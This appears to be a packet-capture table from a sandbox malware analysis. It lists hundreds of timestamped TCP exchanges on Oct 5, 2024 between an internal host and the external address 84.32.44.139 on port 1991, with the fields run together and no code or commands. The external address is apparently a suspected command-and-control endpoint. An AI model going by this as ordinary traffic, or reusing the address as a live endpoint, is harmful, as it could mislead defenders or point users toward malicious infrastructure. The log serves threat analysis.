                                                                                                                          Oct 5, 2024 14:58:29.242013931 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.242058039 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.242387056 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.242418051 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.242466927 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.252578020 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.252621889 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.252684116 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.252722979 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.252758026 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.252778053 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.252793074 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.252826929 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.252861023 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.252895117 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.252931118 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.252969027 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.253015995 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.253015995 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.253015995 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.253015995 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.275039911 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.275083065 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.275141954 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.275177956 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.275211096 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.275244951 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.275274038 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.275274038 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.275279045 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.275312901 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.275332928 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.275351048 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.275399923 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.275409937 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.275449038 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.275502920 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.275537968 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.275572062 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.275620937 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.318231106 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.318280935 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.318300962 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.318530083 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.319431067 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.319489002 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.319523096 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.319552898 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.319586992 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.319595098 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.319629908 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.319638014 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.319672108 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.319705963 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.319742918 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.319925070 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.320005894 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.320038080 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.320090055 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.320103884 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.320122957 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.320156097 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.320177078 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.320188999 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.320220947 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.320228100 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.320252895 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.320286036 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.320292950 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.320415974 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.320456982 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.320466042 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.320499897 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.320532084 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.320542097 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.320565939 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.320605040 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.320619106 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.320653915 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.320684910 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.320697069 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.320720911 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.320759058 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.320761919 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.320812941 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.320844889 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.320862055 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.320882082 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.320921898 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.320929050 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.320960999 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.320992947 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.321000099 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.321027040 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.321068048 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.321103096 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.321135044 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.321177006 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.321185112 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.321218967 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.321250916 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.321259022 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.321285009 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.321317911 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.321326017 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.321356058 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.321391106 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.321397066 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.321604967 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.321647882 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.321686983 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.321721077 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.321772099 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.321829081 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.321861982 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.321894884 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.321908951 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.321929932 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.321983099 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.322009087 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.322042942 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.322082996 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.322093010 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.322127104 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.322159052 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.322169065 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.322192907 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.322225094 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.322236061 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.322257996 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.322292089 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.322297096 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.322439909 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.322483063 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.322509050 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.322561979 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.322596073 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.322635889 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.322659016 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.322693110 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.322726965 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.322732925 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.322760105 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.322798014 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.322799921 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.322829962 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.322868109 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.322925091 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.322958946 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.322992086 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.323002100 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.323024988 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.323059082 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.323065996 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.323091984 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.323124886 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.323131084 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.323299885 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.323333025 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.323342085 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.323534012 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.323566914 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.323575020 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.323601961 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.323633909 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.323642015 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.325179100 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.325227976 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.325236082 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.325269938 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.325303078 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.325309992 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.328419924 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.339278936 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.339366913 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.339432955 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.339437008 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.339489937 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.339525938 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.339545012 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.339560032 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.339593887 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.339608908 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.339628935 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.339663982 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.339677095 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.339719057 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.339752913 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.339761019 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.339787006 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.339821100 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.339828014 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.339854956 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.339890957 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.339896917 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.361666918 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.361763954 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.361836910 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.361895084 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.361931086 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.361983061 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.362019062 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.362051964 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.362068892 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.362068892 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.362095118 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.362102032 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.362126112 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.362164974 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.362199068 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.362231016 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.362265110 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.362284899 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.362284899 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.362298012 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.362320900 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.362332106 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.362365961 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.362519026 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.406521082 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.406636000 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.406672955 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.406709909 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.406723022 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.406723022 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.406744003 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.406800032 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.406835079 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.406872034 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.406882048 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.406882048 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.406905890 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.406939983 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.406995058 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.407018900 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.407032967 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.407066107 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.407082081 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.407115936 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.407149076 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.407182932 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.407195091 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.407195091 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.407217026 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.407250881 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.407284021 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.407319069 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.407322884 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.407322884 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.407543898 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.407577991 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.407612085 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.407644033 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.407654047 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.407654047 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.407677889 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.407711983 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.407748938 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.407788992 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.407788992 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.407901049 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.407933950 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.407967091 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.407999992 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.408000946 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.408034086 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.408067942 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.408101082 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.408108950 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.408108950 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.408138990 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.408196926 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.408399105 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.408431053 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.408463955 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.408497095 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.408530951 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.408538103 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.408538103 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.408564091 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.408596992 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.408628941 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.408662081 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.408669949 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.408669949 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.408696890 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.408730984 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.408763885 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.408797026 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.408803940 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.408803940 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.408829927 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.408864021 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.408896923 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.408931017 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.408936024 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.408936024 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.409241915 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.409274101 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.409307003 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.409333944 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.409333944 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.409339905 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.409373999 CEST19914916984.32.44.139192.168.2.22
                                                                                                                          Oct 5, 2024 14:58:29.409394026 CEST491691991192.168.2.2284.32.44.139
                                                                                                                          Oct 5, 2024 14:58:29.409406900 CEST19914916984.32.44.139192.168.2.22
